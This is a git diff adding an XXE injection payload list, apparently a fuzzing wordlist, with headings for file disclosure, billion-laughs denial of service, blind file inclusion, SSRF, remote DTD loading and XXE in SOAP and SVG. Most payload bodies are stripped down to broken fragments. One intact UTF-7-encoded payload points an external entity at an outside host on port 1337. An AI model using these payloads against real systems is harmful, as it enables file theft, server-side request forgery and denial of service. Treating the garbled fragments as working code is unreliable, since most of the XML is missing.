diff --git a/Intruder/xxe-injection-payload-list.txt.txt b/Intruder/xxe-injection-payload-list.txt.txt
new file mode 100644
index 0000000..032ee07
--- /dev/null
+++ b/Intruder/xxe-injection-payload-list.txt.txt
@@ -0,0 +1,127 @@
+# XML External Entity (XXE) Injection Payloads
+
+* XXE : Classic XXE
+
+
+
+
+]>
+&file;
+
+
+
+ ]>&xxe;
+
+
+
+ ]>&xxe;
+
+
+
+ ]>&xxe;
+
+* XXE: Basic XML Example
+
+
+
+ John
+ Doe
+
+
+* XXE: Entity Example
+
+
+ ]>
+
+ John
+ &example;
+
+
+* XXE: File Disclosure
+
+
+ ]>
+
+ John
+ &ent;
+
+
+* XXE: Denial-of-Service Example
+
+
+
+
+
+
+
+
+
+
+
+&lol9;
+
+* XXE: Local File Inclusion Example
+
+
+
+]>&xxe;
+
+* XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
+
+
+
+
+]>&blind;
+
+* XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
+
+
+]>
+∾
+
+* XXE:SSRF ( Server Side Request Forgery ) Example
+
+
+
+]>&xxe;
+
+* XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
+
+
+]>
+3..2..1...&test
+
+* XXE: UTF-7 Exmaple
+
+
++ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
++ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
+
+* XXE: Base64 Encoded
+
+ %init; ]>
+
+* XXE: XXE inside SOAP Example
+
+
+
+ %dtd;]>]]>
+
+
+
+* XXE: XXE inside SVG
+
+
\ No newline at end of file